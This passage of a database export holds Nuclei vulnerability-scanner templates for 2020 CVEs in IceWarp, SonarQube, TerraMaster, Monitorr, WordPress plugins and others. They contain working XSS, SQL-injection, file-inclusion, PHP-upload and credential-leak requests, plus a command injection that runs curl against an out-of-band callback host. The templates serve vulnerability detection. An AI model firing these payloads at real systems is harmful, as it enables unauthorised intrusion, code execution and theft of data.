4a0a0047304502206614a114a0e46ccd3935e0a85a4ce47db02ad69127536ba5caaf39e4b766fd7b022100e8ec849c63835f81173d35f82f959e45539cb809a531d887b39b8e4880829958:922c64590222798bb761d5b6d8e72950", "hash": "7d950a8eac92e8e50cb379e96ea56075", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f6" }, "name": "CVE-2020-27982.yaml", "content": "id: CVE-2020-27982\n\ninfo:\n name: IceWarp WebMail 11.4.5.0 - Cross-Site Scripting\n author: madrobot\n severity: medium\n description: IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of IceWarp WebMail.\n reference:\n - https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html\n - https://cxsecurity.com/issue/WLB-2020100161\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27982\n - http://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-27982\n cwe-id: CWE-79\n epss-score: 0.00178\n epss-percentile: 0.55072\n cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: icewarp\n product: mail_server\n shodan-query: title:\"icewarp\"\n tags: cve,cve2020,xss,icewarp,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# 
digest: 4a0a00473045022021228856359476fd6a2d98aa76d72aecb684490df2490020087fe9acc00d15bc022100d44cd28e5f19364d83758d6ab7063cd8cc4b7512064a93b92f336fbfc44e35af:922c64590222798bb761d5b6d8e72950", "hash": "e5a69dc79c6d874c24020683977a1128", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f7" }, "name": "CVE-2020-27986.yaml", "content": "id: CVE-2020-27986\n\ninfo:\n name: SonarQube - Authentication Bypass\n author: pikpikcu\n severity: high\n description: |\n SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,\n SVN, and GitLab credentials via the api/settings/values URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information.\n remediation: Reportedly, the vendor's position for SMTP and SVN is \"it is the administrator's responsibility to configure it.\"\n reference:\n - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27866\n - https://github.com/SexyBeast233/SecBooks\n - https://github.com/SouthWind0/southwind0.github.io\n - https://github.com/Z0fhack/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-27986\n cwe-id: CWE-306\n epss-score: 0.25376\n epss-percentile: 0.96582\n cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sonarsource\n product: sonarqube\n tags: cve,cve2020,sonarqube,sonarsource\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/settings/values\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - email.smtp_host.secured\n - email.smtp_password.secured\n - email.smtp_port.secured\n - email.smtp_username.secured\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 
490a00463044022018dd73d96bac6da6fc47257dd5f2f32f35765baeeb0e50c617927f961d1ed43f02204921a13c37cf71890f34425dae58ae03f36c8aec68a45141cbd931b4edc23cec:922c64590222798bb761d5b6d8e72950", "hash": "9e10682274ff44f7fc972843b04b4a03", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f8" }, "name": "CVE-2020-28185.yaml", "content": "id: CVE-2020-28185\n\ninfo:\n name: TerraMaster TOS < 4.2.06 - User Enumeration\n author: pussycat0x\n severity: medium\n description: |\n User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.\n impact: |\n An attacker can enumerate valid usernames, potentially aiding in further attacks.\n remediation: |\n Upgrade TerraMaster TOS to version 4.2.06 or later.\n reference:\n - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md\n - https://nvd.nist.gov/vuln/detail/CVE-2020-28185\n - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/\n - https://www.terra-master.com/\n - https://github.com/ArrestX/--POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-28185\n epss-score: 0.00465\n epss-percentile: 0.74945\n cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: terra-master\n product: tos\n fofa-query: '\"TerraMaster\" && header=\"TOS\"'\n tags: cve2020,cve,terramaster,enum,tos,terra-master\n\nhttp:\n - raw:\n - |\n GET /tos/index.php?user/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wizard/initialise.php HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Requested-With: XMLHttpRequest\n Referer: 
{{RootURL}}/tos/index.php?user/login\n\n tab=checkuser&username=admin\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"username\":'\n - '\"email\":'\n - '\"status\":'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n part: body_2\n regex:\n - '\"username\":\"(.*?)\"'\n - '\"email\":\"(.*?)\"'\n# digest: 4b0a0048304602210083f16f101ac090f5d7e921131e73a027f6009fff40f89865c434db95593638b7022100a606966b55e981d57fde6523d60dc96e82d5cdc44a754742dac2b5268a081294:922c64590222798bb761d5b6d8e72950", "hash": "c62ec274f6f04666db4b26c323e5cc80", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f9" }, "name": "CVE-2020-28188.yaml", "content": "id: CVE-2020-28188\n\ninfo:\n name: TerraMaster TOS - Unauthenticated Remote Command Execution\n author: gy741\n severity: critical\n description: TerraMaster TOS <= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Apply the latest security patch or update provided by TerraMaster to fix the vulnerability.\n reference:\n - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/\n - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html\n - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-28188\n - http://packetstormsecurity.com/files/172880/TerraMaster-TOS-4.2.06-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-28188\n cwe-id: CWE-78\n epss-score: 0.97279\n epss-percentile: 0.99845\n cpe: 
cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: terra-master\n product: tos\n tags: cve2020,cve,packetstorm,terramaster,rce,oast,mirai,unauth,terra-master\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\n Host: {{Hostname}}\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 4a0a0047304502210085ac18d58b25cda6f18fb57df5ee204220cce67dfd2d614ea043b10b5987195b02200ac8512718ee39d10cc0baed51f32d199ac3e7ef8c366405aa49af3e971df93b:922c64590222798bb761d5b6d8e72950", "hash": "eb325b25449ccdd58cde04433b8f5200", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081fa" }, "name": "CVE-2020-28208.yaml", "content": "id: CVE-2020-28208\n\ninfo:\n name: Rocket.Chat <3.9.1 - Information Disclosure\n author: pdteam\n severity: medium\n description: Rocket.Chat through 3.9.1 is susceptible to information disclosure. 
An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n The vulnerability can lead to the exposure of sensitive information, such as user credentials or private conversations, potentially compromising the confidentiality of the system.\n remediation: |\n Upgrade Rocket.Chat to version 3.9.1 or later to mitigate the information disclosure vulnerability (CVE-2020-28208).\n reference:\n - https://trovent.io/security-advisory-2010-01\n - https://trovent.github.io/security-advisories/TRSA-2010-01/TRSA-2010-01.txt\n - http://www.openwall.com/lists/oss-security/2021/01/07/1\n - http://packetstormsecurity.com/files/160845/Rocket.Chat-3.7.1-Email-Address-Enumeration.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-28208\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-28208\n cwe-id: CWE-203\n epss-score: 0.01197\n epss-percentile: 0.84869\n cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rocket.chat\n product: rocket.chat\n tags: cve,cve2020,packetstorm,rocketchat,rocket.chat\n\nhttp:\n - raw:\n - |\n POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n Content-Type: application/json\n\n {\"message\":\"{\\\"msg\\\":\\\"method\\\",\\\"method\\\":\\\"sendForgotPasswordEmail\\\",\\\"params\\\":[\\\"user@local.email\\\"],\\\"id\\\":\\\"3\\\"}\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"result\\\":false'\n - '\"success\":true'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022048dc7f2955a7c8165a805ab421aa67f77e3dbbf8babf696b4c0b85a3d615efcb0220385a7cfa496fb6ae1edfd40595f13672069e6ed62c0b12c3ecfd17a44eca5e72:922c64590222798bb761d5b6d8e72950", "hash": "5ed5b8a70b7ebdf46c367497c443b9ae", "level": 4, "time": 
"2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081fb" }, "name": "CVE-2020-28351.yaml", "content": "id: CVE-2020-28351\n\ninfo:\n name: Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING& page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Mitel to mitigate the XSS vulnerability.\n reference:\n - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html\n - https://www.mitel.com/articles/what-happened-shoretel-products\n - https://nvd.nist.gov/vuln/detail/CVE-2020-28351\n - http://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html\n - https://github.com/dievus/cve-2020-28351\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-28351\n cwe-id: CWE-79\n epss-score: 0.0036\n epss-percentile: 0.71646\n cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mitel\n product: shoretel_firmware\n tags: cve,cve2020,packetstorm,shoretel,xss,mitel\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME\"\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - 
'Content-Type: text/html'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100841aeaf06ae18374ceb5b6b14a6b0052577b9ddc7357154d071ed1c63f4cf12402204ae05b8c456dfca7ba53a4bf76033d75de18a70befd86e6437641a1c574c92e4:922c64590222798bb761d5b6d8e72950", "hash": "f234b14a8d96951f341c001da4c70641", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081fc" }, "name": "CVE-2020-28871.yaml", "content": "id: CVE-2020-28871\n\ninfo:\n name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution\n author: gy741\n severity: critical\n description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access could upload and execute a specially crafted file, leading to remote code execution within Monitorr.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected system.\n remediation: |\n Upgrade to a patched version of Monitorr or apply the necessary security patches.\n reference:\n - https://www.exploit-db.com/exploits/48980\n - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-28871\n - http://packetstormsecurity.com/files/163263/Monitorr-1.7.6m-Bypass-Information-Disclosure-Shell-Upload.html\n - http://packetstormsecurity.com/files/170974/Monitorr-1.7.6-Shell-Upload.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-28871\n cwe-id: CWE-434\n epss-score: 0.96907\n epss-percentile: 0.99693\n cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: monitorr\n product: monitorr\n tags: 
cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project\n\nhttp:\n - raw:\n - |\n POST /assets/php/upload.php HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept: text/plain, */*; q=0.01\n Connection: close\n Accept-Language: en-US,en;q=0.5\n X-Requested-With: XMLHttpRequest\n Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745\n Origin: http://{{Hostname}}\n Referer: http://{{Hostname}}\n\n -----------------------------31046105003900160576454225745\n Content-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.php\"\n Content-Type: image/gif\n\n GIF89a213213123\n\n -----------------------------31046105003900160576454225745--\n - |\n GET /assets/data/usrimg/{{tolower(\"{{randstr}}.php\")}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"d03c180355b797069cc047ff5606d689\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206d7e875ef689448d4fe81a02c406847d917a099c25b098a99ef1316ace5e8c08022100d60b0fa98c183d7f252ecb56b52dc4c78730673b6ed6cffa0013a8e863987a28:922c64590222798bb761d5b6d8e72950", "hash": "a445f869e1d5aaac2571635b8bd94963", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081fd" }, "name": "CVE-2020-28976.yaml", "content": "id: CVE-2020-28976\n\ninfo:\n name: WordPress Canto 1.3.0 - Blind Server-Side Request Forgery\n author: LogicalHunter\n severity: medium\n description: WordPress Canto plugin 1.3.0 is susceptible to blind server-side request forgery. 
An attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources and potential data leakage.\n remediation: |\n Update WordPress Canto to the latest version (1.3.1) or apply the patch provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/49189\n - https://www.canto.com/integrations/wordpress/\n - https://github.com/CantoDAM/Canto-Wordpress-Plugin\n - https://nvd.nist.gov/vuln/detail/CVE-2020-28976\n - http://packetstormsecurity.com/files/160358/WordPress-Canto-1.3.0-Server-Side-Request-Forgery.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-28976\n cwe-id: CWE-918\n epss-score: 0.00616\n epss-percentile: 0.78321\n cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 3\n vendor: canto\n product: canto\n framework: wordpress\n tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/canto/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Canto'\n - 'Tested up to:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}\"\n - \"{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}\"\n - \"{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"null\"\n\n - type: 
word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d337b1a5e97c6aa8fb4bbf4b8a91c3a96475868420a2342fce292b449fe7bee1022100f35e3a1d0316e034d7743c0da40e7540645360cb88356751ac2f6855a3d0adf5:922c64590222798bb761d5b6d8e72950", "hash": "f643279c6cba59c5b61052fdd7673535", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081fe" }, "name": "CVE-2020-29164.yaml", "content": "id: CVE-2020-29164\n\ninfo:\n name: PacsOne Server <7.1.1 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: PacsOne Server (PACS Server In One Box) below 7.1.1 is vulnerable to cross-site scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to PacsOne Server version 7.1.1 or later to mitigate this vulnerability.\n reference:\n - https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d\n - https://pacsone.net/download.htm\n - https://nvd.nist.gov/vuln/detail/CVE-2020-29164\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-29164\n cwe-id: CWE-79\n epss-score: 0.00205\n epss-percentile: 0.5782\n cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rainbowfishsoftware\n product: pacsone_server\n tags: cve,cve2020,pacsone,xss,rainbowfishsoftware\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - '1'\n\n - type: status\n 
status:\n - 200\n# digest: 4b0a00483046022100eef3cee9242d0faa4d39283bfb69171f37df3516899ca083fcabad8c7f4cdcb70221008f958e6457bea7a1c342e6b6efc6c8e6a23e3e42c6f0a677925b842c310e06e6:922c64590222798bb761d5b6d8e72950", "hash": "7d49d21faa4328111f669278c1d52ba3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ff" }, "name": "CVE-2020-29227.yaml", "content": "id: CVE-2020-29227\n\ninfo:\n name: Car Rental Management System 1.0 - Local File Inclusion\n author: daffainfo\n severity: critical\n description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the \"page\" parameter, leading to code execution.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in the Car Rental Management System 1.0.\n reference:\n - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5\n - https://nvd.nist.gov/vuln/detail/CVE-2020-29227\n - https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-29227\n epss-score: 0.01122\n epss-percentile: 0.83087\n cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: car_rental_management_system_project\n product: car_rental_management_system\n tags: cve,cve2020,lfi,car_rental_management_system_project,sqli\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?page=/etc/passwd%00\"\n\n matchers-condition: and\n 
matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210087e6438b7ef91ed9ace5b21965669d3e02629d42a780db4c203d43f6c7e9994102202503aaac6e263ea1eb468d45732cc06a390e660c0e0cf3c6656daf03a4773b3c:922c64590222798bb761d5b6d8e72950", "hash": "582f938b3dba1c7143bcb1785b5ab263", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308200" }, "name": "CVE-2020-29284.yaml", "content": "id: CVE-2020-29284\n\ninfo:\n name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection\n author: edoardottt\n severity: critical\n description: |\n Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Multi Restaurant Table Reservation System 1.0.\n reference:\n - https://www.exploit-db.com/exploits/48984\n - https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip\n - https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md\n - https://nvd.nist.gov/vuln/detail/CVE-2020-29284\n - https://www.sourcecodester.com/php/14568/multi-restaurant-table-reservation-system-php-full-source-code.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-29284\n cwe-id: CWE-89\n epss-score: 0.06718\n 
epss-percentile: 0.93156\n cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: multi_restaurant_table_reservation_system_project\n product: multi_restaurant_table_reservation_system\n tags: cve,cve2020,tablereservation,sqli,unauth,edb,multi_restaurant_table_reservation_system_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n\n - type: word\n part: body\n words:\n - \"Restaurent Tables\"\n - \"Chair List\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022077b1c5498dae902e0ad7e7405b7d959c4faf796f270db4dc8ad70f78d13f8abd0221009a4e7d605a8b99d9957f179e9e090b48217d6acde1a09be14427c5a9ceadc952:922c64590222798bb761d5b6d8e72950", "hash": "e00f30c831877928c9db1a5e9bf20198", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308201" }, "name": "CVE-2020-29395.yaml", "content": "id: CVE-2020-29395\n\ninfo:\n name: Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.\n remediation: |\n Update to the latest version of the Wordpress EventON Calendar plugin (3.0.6) to mitigate this vulnerability.\n reference:\n - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS\n - https://www.myeventon.com/news/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-29395\n - 
http://packetstormsecurity.com/files/160282/WordPress-EventON-Calendar-3.0.5-Cross-Site-Scripting.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-29395\n cwe-id: CWE-79\n epss-score: 0.05489\n epss-percentile: 0.93026\n cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: myeventon\n product: eventon\n framework: wordpress\n tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm,myeventon\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/eventON/'\n\n - method: GET\n path:\n - '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201a710f599e37ca84f4c5ce50b0de3c5b186ecb2e2cde5baa91a5c12c03034c4102204701cdfa4f09f39c53d5b5c108f3d652ba3f452608e7b4a10e86eb9f1b2cbf65:922c64590222798bb761d5b6d8e72950", "hash": "e0ffc8f8c2be3201744beae0d4a337c3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308202" }, "name": "CVE-2020-29453.yaml", "content": "id: CVE-2020-29453\n\ninfo:\n name: Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)\n author: dwisiswant0\n severity: medium\n description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.\n impact: |\n An attacker can retrieve sensitive files containing configuration information, potentially leading to further exploitation or unauthorized access.\n remediation: |\n Apply the necessary patches or updates provided by 
